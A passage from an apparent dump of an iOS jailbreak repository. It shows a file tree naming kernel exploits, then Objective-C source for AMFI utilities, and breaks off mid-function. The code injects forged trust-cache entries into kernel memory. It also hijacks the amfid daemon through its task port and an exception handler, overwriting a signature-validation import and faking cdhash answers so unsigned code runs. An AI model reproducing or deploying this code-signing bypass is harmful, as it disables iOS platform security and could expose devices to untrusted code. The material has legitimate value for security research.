Showing preview only (871K chars total). Download the full file or copy to clipboard to get everything.
Repository: GeoSn0w/Blizzard-Jailbreak
Branch: master
Commit: db2570f7d3d8
Files: 102
Total size: 832.6 KB
Directory structure:
gitextract_8ln0kc37/
├── .gitignore
├── AMFI Utilities/
│ ├── amfi_utils.h
│ ├── amfi_utils.m
│ ├── amfid.h
│ ├── amfid.m
│ ├── amfid_mem.h
│ ├── amfid_mem.m
│ ├── amfid_tools.h
│ ├── amfid_tools.m
│ ├── cs_blob.h
│ ├── osobject.c
│ └── osobject.h
├── APFS Utilities/
│ ├── IOKit.h
│ ├── liboffsetfinder64.hpp
│ ├── offsetfinder.cpp
│ ├── rootfs_remount.h
│ ├── rootfs_remount.m
│ ├── snapshot_tools.c
│ └── snapshot_tools.h
├── Base Binaries/
│ └── tar
├── Blizzard Jailbreak/
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets/
│ │ ├── AppIcon.appiconset/
│ │ │ └── Contents.json
│ │ ├── Contents.json
│ │ ├── button_mask.imageset/
│ │ │ └── Contents.json
│ │ ├── jailbreak_wallpaper.imageset/
│ │ │ └── Contents.json
│ │ ├── snow.imageset/
│ │ │ └── Contents.json
│ │ └── winter.imageset/
│ │ └── Contents.json
│ ├── Base.lproj/
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── BlizzardLog.h
│ ├── BlizzardLog.m
│ ├── BlizzardSpawnerTools.c
│ ├── BlizzardSpawnerTools.h
│ ├── Info.plist
│ ├── blizzardJailbreak.h
│ ├── blizzardJailbreak.m
│ ├── blizzardView.h
│ ├── blizzardView.m
│ └── main.m
├── Blizzard Jailbreak.xcodeproj/
│ ├── project.pbxproj
│ ├── project.xcworkspace/
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata/
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata/
│ │ ├── geosn0w.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── jakejames.xcuserdatad/
│ │ │ └── UserInterfaceState.xcuserstate
│ │ └── pwn20wnd.xcuserdatad/
│ │ └── UserInterfaceState.xcuserstate
│ ├── xcshareddata/
│ │ └── xcschemes/
│ │ └── sock_port.xcscheme
│ └── xcuserdata/
│ ├── geosn0w.xcuserdatad/
│ │ └── xcdebugger/
│ │ └── Breakpoints_v2.xcbkptlist
│ ├── jakejames.xcuserdatad/
│ │ ├── xcdebugger/
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes/
│ │ └── xcschememanagement.plist
│ └── pwn20wnd.xcuserdatad/
│ └── xcschemes/
│ └── xcschememanagement.plist
├── Exploits/
│ ├── FreeTheSandbox/
│ │ ├── IOTypes.h
│ │ ├── freethesandbox.h
│ │ ├── ios13_change_offsets.m
│ │ ├── ios13_kernel_universal.c
│ │ ├── ios13_userspace.c
│ │ ├── ios13_userspace_pac.c
│ │ ├── ios_7st_utils.m
│ │ ├── libsnappy.c
│ │ ├── libsnappy.h
│ │ ├── vnode.h
│ │ └── xpc.h
│ ├── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ └── IOTypes.h
│ └── sock_port/
│ ├── exploit.c
│ ├── exploit.h
│ ├── exploit_utilities.c
│ ├── exploit_utilities.h
│ ├── include/
│ │ └── IOKit/
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── iosurface.c
│ ├── iosurface.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── offsetof.c
│ ├── offsetof.h
│ ├── offsets.h
│ └── offsets.m
├── Helper Libraries/
│ ├── libimg4tool.a
│ ├── libmerged.a
│ ├── liboffsetfinder64.a
│ ├── libplist++.a
│ └── libplist.a
├── Kernel Utilities/
│ ├── kernSymbolication.c
│ ├── kernSymbolication.h
│ ├── kernel_utils.h
│ ├── kernel_utils.m
│ ├── kexecute.c
│ ├── kexecute.h
│ ├── lzssdec.cpp
│ ├── lzssdec.hpp
│ └── system_reboot.h
├── LICENSE
├── PatchFinder/
│ ├── patchfinder64.h
│ └── patchfinder64.m
├── README.md
└── Vanity/
└── readme.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.DS_Store
================================================
FILE: AMFI Utilities/amfi_utils.h
================================================
#import <stdio.h>
#import <sys/types.h>
#import "../AMFI Utilities/cs_blob.h"
#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)
typedef char hash_t[20];
struct trust_chain {
uint64_t next;
unsigned char uuid[16];
unsigned int count;
} __attribute__((packed));
void *load_bytes(FILE *file, off_t offset, size_t size);
int strtail(const char *str, const char *tail);
void getSHA256inplace(const uint8_t* code_dir, uint8_t *out);
uint8_t *getSHA256(const uint8_t* code_dir);
uint8_t *getCodeDirectory(const char* name);
uint64_t ubc_cs_blob_allocate(vm_size_t size);
void kern_free(uint64_t addr, vm_size_t size);
int cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements);
uint64_t getCodeSignatureLC(FILE *file, int64_t *machOff);
int addBinaryToAMFITrustCache(const char *path);
int amfiTrustHash(hash_t hash);
const struct cs_hash *cs_find_md(uint8_t type);
================================================
FILE: AMFI Utilities/amfi_utils.m
================================================
// Comes from Electra, adapted for FAT binary support by Jake James
//
// amfi_utils.c
// electra
//
// Created by Jamie on 27/01/2018.
// Copyright © 2018 Electra Team. All rights reserved.
//
#include "amfi_utils.h"
#include "kernel_utils.h"
#include "patchfinder64.h"
#include <stdlib.h>
#include <mach-o/loader.h>
#include <mach-o/fat.h>
#include <CommonCrypto/CommonDigest.h>
#include <Foundation/Foundation.h>
#include "../Kernel Utilities/kexecute.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../Exploits/sock_port/kernel_memory.h"
#include <sys/mman.h>
uint32_t swap_uint32( uint32_t val ) {
val = ((val << 8) & 0xFF00FF00 ) | ((val >> 8) & 0xFF00FF );
return (val << 16) | (val >> 16);
}
uint32_t read_magic(FILE* file, off_t offset) {
uint32_t magic;
fseek(file, offset, SEEK_SET);
fread(&magic, sizeof(uint32_t), 1, file);
return magic;
}
void *load_bytes(FILE *file, off_t offset, size_t size) {
void *buf = calloc(1, size);
fseek(file, offset, SEEK_SET);
fread(buf, size, 1, file);
return buf;
}
void getSHA256inplace(const uint8_t* code_dir, uint8_t *out) {
if (code_dir == NULL) {
printf("AMFI TOOLS: NULL passed to getSHA256inplace!\n");
return;
}
uint32_t* code_dir_int = (uint32_t*)code_dir;
uint32_t realsize = 0;
for (int j = 0; j < 10; j++) {
if (swap_uint32(code_dir_int[j]) == 0xfade0c02) {
realsize = swap_uint32(code_dir_int[j+1]);
code_dir += 4*j;
}
}
CC_SHA256(code_dir, realsize, out);
}
uint8_t *getSHA256(const uint8_t* code_dir) {
uint8_t *out = malloc(CC_SHA256_DIGEST_LENGTH);
getSHA256inplace(code_dir, out);
return out;
}
uint8_t *getCodeDirectory(const char* name) {
FILE* fd = fopen(name, "r");
uint32_t magic;
fread(&magic, sizeof(magic), 1, fd);
fseek(fd, 0, SEEK_SET);
long off = 0, file_off = 0;
int ncmds = 0;
BOOL foundarm64 = false;
if (magic == MH_MAGIC_64) {
struct mach_header_64 mh64;
fread(&mh64, sizeof(mh64), 1, fd);
off = sizeof(mh64);
ncmds = mh64.ncmds;
}
else if (magic == MH_MAGIC) {
printf("AMFI TOOLS: %s is 32bit. What are you doing here?\n", name);
fclose(fd);
return NULL;
}
else if (magic == 0xBEBAFECA) {
size_t header_size = sizeof(struct fat_header);
size_t arch_size = sizeof(struct fat_arch);
size_t arch_off = header_size;
struct fat_header *fat = (struct fat_header*)load_bytes(fd, 0, header_size);
struct fat_arch *arch = (struct fat_arch *)load_bytes(fd, arch_off, arch_size);
int n = swap_uint32(fat->nfat_arch);
printf("AMFI TOOLS: Binary is FAT with %d architectures\n", n);
while (n-- > 0) {
magic = read_magic(fd, swap_uint32(arch->offset));
if (magic == 0xFEEDFACF) {
printf("AMFI TOOLS: Found arm64\n");
foundarm64 = true;
struct mach_header_64* mh64 = (struct mach_header_64*)load_bytes(fd, swap_uint32(arch->offset), sizeof(struct mach_header_64));
file_off = swap_uint32(arch->offset);
off = swap_uint32(arch->offset) + sizeof(struct mach_header_64);
ncmds = mh64->ncmds;
break;
}
arch_off += arch_size;
arch = load_bytes(fd, arch_off, arch_size);
}
if (!foundarm64) {
printf("AMFI TOOLS: No arm64? RIP\n");
fclose(fd);
return NULL;
}
}
else {
printf("AMFI TOOLS: %s is not a macho! (or has foreign endianness?) (magic: %x)\n", name, magic);
fclose(fd);
return NULL;
}
for (int i = 0; i < ncmds; i++) {
struct load_command cmd;
fseek(fd, off, SEEK_SET);
fread(&cmd, sizeof(struct load_command), 1, fd);
if (cmd.cmd == LC_CODE_SIGNATURE) {
uint32_t off_cs;
fread(&off_cs, sizeof(uint32_t), 1, fd);
uint32_t size_cs;
fread(&size_cs, sizeof(uint32_t), 1, fd);
uint8_t *cd = malloc(size_cs);
fseek(fd, off_cs + file_off, SEEK_SET);
fread(cd, size_cs, 1, fd);
fclose(fd);
return cd;
} else {
off += cmd.cmdsize;
}
}
fclose(fd);
return NULL;
}
//from xerub
int strtail(const char *str, const char *tail)
{
size_t lstr = strlen(str);
size_t ltail = strlen(tail);
if (ltail > lstr) {
return -1;
}
str += lstr - ltail;
return memcmp(str, tail, ltail);
}
int cs_validate_csblob(const uint8_t *addr, size_t length, CS_CodeDirectory **rcd, CS_GenericBlob **rentitlements) {
uint64_t rcdptr = kalloc(sizeof(uint64_t));
uint64_t entptr = kalloc(sizeof(uint64_t));
int ret = (int)kexecute(Find_cs_validate_csblob(), (uint64_t)addr, length, rcdptr, entptr, 0, 0, 0);
*rcd = (CS_CodeDirectory *)rk64(rcdptr);
*rentitlements = (CS_GenericBlob *)rk64(entptr);
kfree(rcdptr, sizeof(uint64_t));
kfree(entptr, sizeof(uint64_t));
return ret;
}
uint64_t ubc_cs_blob_allocate(vm_size_t size) {
if (size <= 0x1ff8) {
uint64_t size_p = kalloc(sizeof(vm_size_t));
if (!size_p) return 0;
kwrite(size_p, &size, sizeof(vm_size_t));
uint64_t kall = Find_kalloc_canblock();
if (!kall) return 0;
uint64_t site = Find_cs_blob_allocate_site();
if (!site) return 0;
uint64_t alloced = kexecute(kall, size_p, 1, site, 0, 0, 0, 0);
if (!alloced) return 0;
kfree(size_p, sizeof(vm_size_t));
alloced = ZmFixAddr(alloced);
return alloced;
}
else {
size = (size + 0x3fff) & ~0x3fff;
uint64_t addrp = kalloc(sizeof(uint64_t));
if (!addrp) return 0;
uint64_t kernel_map = Find_kernel_map();
if (!kernel_map) return 0;
kernel_map = rk64(kernel_map);
if (!kernel_map) return 0;
uint64_t alloc = Find_kernel_memory_allocate();
if (!alloc) return 0;
kexecute(alloc, kernel_map, addrp, size, 0, 4, 17, 0);
addrp = rk64(addrp);
return addrp;
}
}
void kern_free(uint64_t addr, vm_size_t size) {
if (size > 0x1ff8) size = (size + 0x3fff) & ~0x3fff;
kexecute(Find_kfree(), addr, size, 0, 0, 0, 0, 0);
}
const struct cs_hash *cs_find_md(uint8_t type) {
return (struct cs_hash *)rk64(Find_cs_find_md() + ((type - 1) * 8));
}
uint64_t getCodeSignatureLC(FILE *file, int64_t *machOff) {
size_t offset = 0;
struct load_command *cmd = NULL;
*machOff = -1;
uint32_t *magic = load_bytes(file, offset, sizeof(uint32_t));
int ncmds = 0;
if (*magic != 0xFEEDFACF && *magic != 0xBEBAFECA) {
printf("AMFI TOOLS: File is not an arm64 or FAT macho!\n");
free(magic);
return 0;
}
if(*magic == 0xBEBAFECA) {
uint32_t arch_off = sizeof(struct fat_header);
struct fat_header *fat = (struct fat_header*)load_bytes(file, 0, sizeof(struct fat_header));
bool foundarm64 = false;
int n = ntohl(fat->nfat_arch);
printf("AMFI TOOLS: Binary is FAT with %d architectures\n", n);
while (n-- > 0) {
struct fat_arch *arch = (struct fat_arch *)load_bytes(file, arch_off, sizeof(struct fat_arch));
if (ntohl(arch->cputype) == 0x100000c) {
printf("AMFI TOOLS: Found arm64\n");
offset = ntohl(arch->offset);
foundarm64 = true;
free(fat);
free(arch);
break;
}
free(arch);
arch_off += sizeof(struct fat_arch);
}
if (!foundarm64) {
printf("AMFI TOOLS: Binary does not have any arm64 slice\n");
free(fat);
free(magic);
return 0;
}
}
free(magic);
*machOff = offset;
struct mach_header_64 *mh64 = load_bytes(file, offset, sizeof(struct mach_header_64));
ncmds = mh64->ncmds;
free(mh64);
offset += sizeof(struct mach_header_64);
for (int i = 0; i < ncmds; i++) {
cmd = load_bytes(file, offset, sizeof(struct load_command));
if (cmd->cmd == LC_CODE_SIGNATURE) {
free(cmd);
return offset;
}
offset += cmd->cmdsize;
free(cmd);
}
return 0;
}
int addBinaryToAMFITrustCache(const char *path) {
NSMutableArray *paths = [NSMutableArray array];
NSFileManager *fileManager = [NSFileManager defaultManager];
BOOL isDir = NO;
if (![fileManager fileExistsAtPath:@(path) isDirectory:&isDir]) {
printf("AMFI TRUST: Path does not exist!\n");
return -1;
}
NSURL *directoryURL = [NSURL URLWithString:@(path)];
NSArray *keys = [NSArray arrayWithObject:NSURLIsDirectoryKey];
if (isDir) {
NSDirectoryEnumerator *enumerator = [fileManager
enumeratorAtURL:directoryURL
includingPropertiesForKeys:keys
options:0
errorHandler:^(NSURL *url, NSError *error) {
if (error) printf("AMFI TRUST: %s\n", [[error localizedDescription] UTF8String]);
return YES;
}];
for (NSURL *url in enumerator) {
NSError *error;
NSNumber *isDirectory = nil;
if (![url getResourceValue:&isDirectory forKey:NSURLIsDirectoryKey error:&error]) {
if (error) continue;
}
else if (![isDirectory boolValue]) {
int rv;
int fd;
uint8_t *p;
off_t sz;
struct stat st;
uint8_t buf[16];
char *fpath = strdup([[url path] UTF8String]);
if (strtail(fpath, ".plist") == 0 || strtail(fpath, ".nib") == 0 || strtail(fpath, ".strings") == 0 || strtail(fpath, ".png") == 0) {
continue;
}
rv = lstat(fpath, &st);
if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {
continue;
}
fd = open(fpath, O_RDONLY);
if (fd < 0) {
continue;
}
sz = read(fd, buf, sizeof(buf));
if (sz != sizeof(buf)) {
close(fd);
continue;
}
if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {
close(fd);
continue;
}
p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED) {
close(fd);
continue;
}
[paths addObject:@(fpath)];
printf("AMFI TRUST: ADDING TO TRUST CACHE %s\n", fpath);
free(fpath);
}
}
if ([paths count] == 0) {
printf("AMFI TRUST: No files in %s passed the integrity checks!\n", path);
return -2;
}
}
else {
printf("AMFI TRUST: ADDING TO TRUST CACHE %s\n", path);
[paths addObject:@(path)];
int rv;
int fd;
uint8_t *p;
off_t sz;
struct stat st;
uint8_t buf[16];
if (strtail(path, ".plist") == 0 || strtail(path, ".nib") == 0 || strtail(path, ".strings") == 0 || strtail(path, ".png") == 0) {
printf("AMFI TRUST Binary not an executable! Kernel doesn't like trusting data, geez\n");
return 2;
}
rv = lstat(path, &st);
if (rv || !S_ISREG(st.st_mode) || st.st_size < 0x4000) {
printf("AMFI TRUST Binary too big\n");
return 3;
}
fd = open(path, O_RDONLY);
if (fd < 0) {
printf("AMFI TRUST Don't have permission to open file\n");
return 4;
}
sz = read(fd, buf, sizeof(buf));
if (sz != sizeof(buf)) {
close(fd);
printf("AMFI TRUST Failed to read from binary\n");
return 5;
}
if (*(uint32_t *)buf != 0xBEBAFECA && !MACHO(buf)) {
close(fd);
printf("AMFI TRUST Binary not a macho!\n");
return 6;
}
p = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED) {
close(fd);
printf("AMFI TRUST Failed to mmap file\n");
return 7;
}
}
uint64_t trust_chain = Find_trustcache();
printf("AMFI TRUST trust_chain at 0x%llx\n", trust_chain);
struct trust_chain fake_chain;
fake_chain.next = rk64(trust_chain);
arc4random_buf(fake_chain.uuid, 16);
int cnt = 0;
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
hash_t *allhash = malloc(sizeof(hash_t) * [paths count]);
for (int i = 0; i != [paths count]; ++i) {
uint8_t *cd = getCodeDirectory((char*)[[paths objectAtIndex:i] UTF8String]);
if (cd != NULL) {
getSHA256inplace(cd, hash);
memmove(allhash[cnt], hash, sizeof(hash_t));
++cnt;
}
else {
printf("AMFI TRUST CD NULL\n");
continue;
}
}
fake_chain.count = cnt;
size_t length = (sizeof(fake_chain) + cnt * sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
uint64_t kernel_trust = kalloc(length);
printf("AMFI TRUST allocated: 0x%zx => 0x%llx\n", length, kernel_trust);
kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));
kwrite(kernel_trust + sizeof(fake_chain), allhash, cnt * sizeof(hash_t));
#if __arm64e__
Kernel_Execute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);
#else
wk64(trust_chain, kernel_trust);
#endif
free(allhash);
return 0;
}
int amfiTrustHash(hash_t hash) {
uint64_t trust_chain = Find_trustcache();
printf("AMFI TRUST trust_chain at 0x%llx\n", trust_chain);
struct trust_chain fake_chain;
fake_chain.next = rk64(trust_chain);
arc4random_buf(fake_chain.uuid, 16);
fake_chain.count = 1;
size_t length = (sizeof(fake_chain) + sizeof(hash_t) + 0x3FFF) & ~0x3FFF;
uint64_t kernel_trust = kalloc(length);
printf("AMFI TRUST allocated: 0x%zx => 0x%llx\n", length, kernel_trust);
kwrite(kernel_trust, &fake_chain, sizeof(fake_chain));
kwrite(kernel_trust + sizeof(fake_chain), hash, sizeof(hash_t));
#if __arm64e__
kexecute(Find_pmap_load_trust_cache_ppl(), kernel_trust, length, 0, 0, 0, 0, 0);
#else
wk64(trust_chain, kernel_trust);
#endif
return 0;
}
================================================
FILE: AMFI Utilities/amfid.h
================================================
#import <dlfcn.h>
#import <stdio.h>
#import <unistd.h>
#import <sys/types.h>
#import <mach/mach.h>
#import <mach-o/loader.h>
#import <mach/error.h>
#import <errno.h>
#import <stdlib.h>
#import <sys/sysctl.h>
#import <dlfcn.h>
#import <sys/mman.h>
#import <spawn.h>
#import <sys/stat.h>
#import <pthread.h>
#import <signal.h>
#import <mach/thread_state.h>
#import <mach/thread_status.h>
#import <mach/thread_info.h>
void* AMFIDExceptionHandler(void* arg);
int setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*));
uint64_t patchAMFID(void);
#pragma pack(4)
typedef struct {
mach_msg_header_t Head;
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t thread;
mach_msg_port_descriptor_t task;
NDR_record_t NDR;
} exception_raise_request; // the bits we need at least
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} exception_raise_reply;
#pragma pack()
#define amfid_MISValidateSignatureAndCopyInfo_import_offset 0x4150
================================================
FILE: AMFI Utilities/amfid.m
================================================
// From JelbrekLib, by Jake James!
#import "../AMFI Utilities/amfid.h"
#import "../AMFI Utilities/amfid_mem.h"
#import "../AMFI Utilities/amfi_utils.h"
#import "../AMFI Utilities/amfid_tools.h"
#import "../Kernel Utilities/kernel_utils.h"
#import "../AMFI Utilities/cs_blob.h"
#import "../Exploits/sock_port/offsetof.h"
#import <Foundation/Foundation.h>
#include "../PatchFinder/patchfinder64.h"
#include "../AMFI Utilities/osobject.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
pthread_t exceptionThread;
static mach_port_name_t AMFID_ExceptionPort = MACH_PORT_NULL;
uint64_t origAMFID_MISVSACI = 0;
uint64_t amfid_base_old;
BOOL entitlePidOnAMFI(pid_t pid, const char *ent, BOOL val) {
if (!pid) return NO;
uint64_t proc = proc_of_pid(pid);
uint64_t ucred = rk64(proc + off_p_ucred);
uint64_t cr_label = rk64(ucred + off_ucred_cr_label);
uint64_t entitlements = rk64(cr_label + off_amfi_slot);
if (OSDictionary_GetItem(entitlements, ent) == 0) {
printf("AMFI TOOLS: Setting Entitlements...\n");
uint64_t entval = OSDictionary_GetItem(entitlements, ent);
printf("AMFI TOOLS: before: %s is 0x%llx\n", ent, entval);
OSDictionary_SetItem(entitlements, ent, (val) ? Find_OSBoolean_True() : Find_OSBoolean_False());
entval = OSDictionary_GetItem(entitlements, ent);
printf("AMFI TOOLS: after: %s is 0x%llx\n", ent, entval);
return (entval) ? YES : NO;
}
return YES;
}
uint64_t binary_load_address(mach_port_t tp) {
kern_return_t err;
mach_msg_type_number_t region_count = VM_REGION_BASIC_INFO_COUNT_64;
memory_object_name_t object_name = MACH_PORT_NULL; /* unused */
mach_vm_size_t target_first_size = 0x1000;
mach_vm_address_t target_first_addr = 0x0;
struct vm_region_basic_info_64 region = {0};
printf("AMFI TOOLS: About to call mach_vm_region\n");
err = mach_vm_region(tp, &target_first_addr, &target_first_size, VM_REGION_BASIC_INFO_64, (vm_region_info_t)®ion, ®ion_count, &object_name);
if (err != KERN_SUCCESS) {
printf("AMFI TOOLS: Failed to get the region: %s\n", mach_error_string(err));
return -1;
}
printf("AMFI TOOLS: Got base address\n");
return target_first_addr;
}
#if !__arm64e__
void* AMFIDExceptionHandler(void* arg) {
uint32_t size = 0x1000;
mach_msg_header_t* msg = malloc(size);
for(;;) {
kern_return_t ret;
printf("AMFI TOOLS: AMFID: Calling mach_msg to receive exception message from amfid\n");
ret = mach_msg(msg, MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, 0, size, AMFID_ExceptionPort, 0, 0);
if (ret != KERN_SUCCESS){
printf("AMFI TOOLS: AMFID: Error receiving exception port: %s\n", mach_error_string(ret));
continue;
} else {
printf("AMFI TOOLS: AMFID: Got called!\n");
exception_raise_request* req = (exception_raise_request*)msg;
mach_port_t thread_port = req->thread.name;
mach_port_t task_port = req->task.name;
_STRUCT_ARM_THREAD_STATE64 old_state = {0};
mach_msg_type_number_t old_stateCnt = sizeof(old_state)/4;
ret = thread_get_state(thread_port, ARM_THREAD_STATE64, (thread_state_t)&old_state, &old_stateCnt);
if (ret != KERN_SUCCESS){
printf("AMFI TOOLS: Error getting thread state: %s\n", mach_error_string(ret));
continue;
}
printf("AMFI TOOLS: Got thread state!\n");
_STRUCT_ARM_THREAD_STATE64 new_state;
memcpy(&new_state, &old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
char* filename = (char*)AmfidRead(new_state.__x[25], 1024);
uint8_t *orig_cdhash = (uint8_t*)AmfidRead(new_state.__x[24], CS_CDHASH_LEN);
printf("AMFI TOOLS: Got request for: %s\n", filename);
printf("AMFI TOOLS: Original cdhash: \n\t");
for (int i = 0; i < CS_CDHASH_LEN; i++) {
printf("AMFI TOOLS: Original CDHash%02x ", orig_cdhash[i]);
}
printf("\n");
if (strlen((char*)orig_cdhash)) {
amfid_base_old = binary_load_address(task_port);
printf("AMFI TOOLS: Jumping thread to 0x%llx\n", origAMFID_MISVSACI);
new_state.__pc = origAMFID_MISVSACI;
} else {
uint8_t* code_directory = getCodeDirectory(filename);
if (!code_directory) {
printf("AMFI TOOLS: Can't get code directory\n");
goto end;
}
uint8_t cd_hash[CS_CDHASH_LEN];
if (parse_superblob(code_directory, cd_hash)) {
printf("AMFI TOOLS: parse_superblob failed\n");
goto end;
}
printf("AMFI TOOLS: New cdhash: \n\t");
for (int i = 0; i < CS_CDHASH_LEN; i++) {
printf("AMFI TOOLS: CDHash%02x ", cd_hash[i]);
}
printf("\n");
new_state.__pc = origAMFID_MISVSACI;
ret = mach_vm_write(task_port, old_state.__x[24], (vm_offset_t)&cd_hash, 20);
if (ret == KERN_SUCCESS)
{
printf("AMFI TOOLS: Wrote the cdhash into amfid\n");
} else {
printf("AMFI TOOLS: Unable to write the cdhash into amfid!\n");
}
AmfidWrite_32bits(old_state.__x[20], 1);
new_state.__pc = (old_state.__lr & 0xfffffffffffff000) + 0x1000; // 0x2dacwhere to continue
printf("AMFI TOOLS: Old PC: 0x%llx, new PC: 0x%llx\n", old_state.__pc, new_state.__pc);
}
ret = thread_set_state(thread_port, 6, (thread_state_t)&new_state, sizeof(new_state)/4);
if (ret != KERN_SUCCESS) {
printf("AMFI TOOLS: Failed to set new thread state %s\n", mach_error_string(ret));
} else {
printf("AMFI TOOLS: Success setting new state for amfid!\n");
}
exception_raise_reply reply = {0};
reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(req->Head.msgh_bits), 0);
reply.Head.msgh_size = sizeof(reply);
reply.Head.msgh_remote_port = req->Head.msgh_remote_port;
reply.Head.msgh_local_port = MACH_PORT_NULL;
reply.Head.msgh_id = req->Head.msgh_id + 0x64;
reply.NDR = req->NDR;
reply.RetCode = KERN_SUCCESS;
ret = mach_msg(&reply.Head, 1, (mach_msg_size_t)sizeof(reply), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
mach_port_deallocate(mach_task_self(), thread_port);
mach_port_deallocate(mach_task_self(), task_port);
if (ret != KERN_SUCCESS){
printf("AMFI TOOLS: Failed to send the reply to the exception message %s\n", mach_error_string(ret));
} else{
printf("AMFI TOOLS: Replied to the amfid exception...\n");
}
end:;
free(filename);
free(orig_cdhash);
}
}
return NULL;
}
int setAmfidExceptionHandler(mach_port_t amfid_task_port, void *(exceptionHandler)(void*)){
if (!MACH_PORT_VALID(amfid_task_port)) {
printf("AMFI TOOLS: Invalid amfid task port\n");
return 1;
}
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &AMFID_ExceptionPort);
mach_port_insert_right(mach_task_self(), AMFID_ExceptionPort, AMFID_ExceptionPort, MACH_MSG_TYPE_MAKE_SEND);
if (!MACH_PORT_VALID(AMFID_ExceptionPort)) {
printf("AMFI TOOLS: Invalid amfid exception port\n");
return 1;
}
printf("AMFI TOOLS: amfid_task_port = 0x%x\n", amfid_task_port);
printf("AMFI TOOLS: AMFID_ExceptionPort = 0x%x\n", AMFID_ExceptionPort);
kern_return_t ret = task_set_exception_ports(amfid_task_port, EXC_MASK_ALL, AMFID_ExceptionPort, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, ARM_THREAD_STATE64);
if (ret != KERN_SUCCESS){
printf("AMFI TOOLS: Error setting amfid exception port: %s\n", mach_error_string(ret));
} else {
printf("AMFI TOOLS: Success setting amfid exception port!\n");
pthread_create(&exceptionThread, NULL, exceptionHandler, NULL);
return 0;
}
return 1;
}
uint64_t patchAMFID() {
printf("AMFI TOOLS: Patching AMFID...\n");
pid_t amfid_pid = pid_of_procName("amfid");
printf("AMFI TOOLS: amfid's PID: %d\n", amfid_pid);
entitlePidOnAMFI(amfid_pid, "get-task-allow", YES);
setcsflags(amfid_pid);
printf("AMFI TOOLS: Getting task port\n");
mach_port_t amfid_task_port;
kern_return_t kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_task_port);
if (kr) {
printf("AMFI TOOLS: Failed to get amfid's task :(\n\tError: %s\n", mach_error_string(kr));
return -1;
}
if (!MACH_PORT_VALID(amfid_task_port)) {
printf("AMFI TOOLS: Failed to get amfid's task port!\n");
return -1;
}
printf("AMFI TOOLS: Got amfid's task port? :) 0x%x\n", amfid_task_port);
init_amfid_mem(amfid_task_port);
setAmfidExceptionHandler(amfid_task_port, AMFIDExceptionHandler);
printf("AMFI TOOLS: About to search for the binary load address\n");
amfid_base_old = binary_load_address(amfid_task_port);
printf("AMFI TOOLS: Amfid load address: 0x%llx\n", amfid_base_old);
mach_vm_size_t sz;
kr = mach_vm_read_overwrite(amfid_task_port, amfid_base_old+amfid_MISValidateSignatureAndCopyInfo_import_offset, 8, (mach_vm_address_t)&origAMFID_MISVSACI, &sz);
if (kr != KERN_SUCCESS) {
printf("AMFI TOOLS: Error reading MISVSACI: %s\n", mach_error_string(kr));
return -1;
}
printf("AMFI TOOLS: Original MISVSACI 0x%llx\n", origAMFID_MISVSACI);
AmfidWrite_64bits(amfid_base_old + amfid_MISValidateSignatureAndCopyInfo_import_offset, 0x4141414141414141);
printf("[i] AMFI TOOLS: AMFID hopefully patched\n");
return origAMFID_MISVSACI;
}
#endif
================================================
FILE: AMFI Utilities/amfid_mem.h
================================================
#import <stdio.h>
#import <mach-o/loader.h>
#import <stdlib.h>
#import <fcntl.h>
#import <unistd.h>
#import <errno.h>
#import <mach/mach.h>
#import <sys/stat.h>
void init_amfid_mem(mach_port_t amfid_tp);
void* AmfidRead(uint64_t addr, uint64_t len);
void AmfidWrite_8bits(uint64_t addr, uint8_t val);
void AmfidWrite_64bits(uint64_t addr, uint64_t val);
void AmfidWrite_32bits(uint64_t addr, uint32_t val);
void* AmfidRead(uint64_t addr, uint64_t len);
================================================
FILE: AMFI Utilities/amfid_mem.m
================================================
#import "amfid_mem.h"
#import "kernel_utils.h"
#import <Foundation/Foundation.h>
static mach_port_t amfid_task_port;
void init_amfid_mem(mach_port_t amfid_tp) {
amfid_task_port = amfid_tp;
}
void* AmfidRead(uint64_t addr, uint64_t len) {
kern_return_t ret;
vm_offset_t buf = 0;
mach_msg_type_number_t num = 0;
ret = mach_vm_read(amfid_task_port, addr, len, &buf, &num);
if (ret != KERN_SUCCESS) {
printf("AMFI TOOLS: amfid read failed (0x%llx)\n", addr);
return NULL;
}
uint8_t* outbuf = malloc(len);
memcpy(outbuf, (void*)buf, len);
mach_vm_deallocate(mach_task_self(), buf, num);
return outbuf;
}
void AmfidWrite_8bits(uint64_t addr, uint8_t val) {
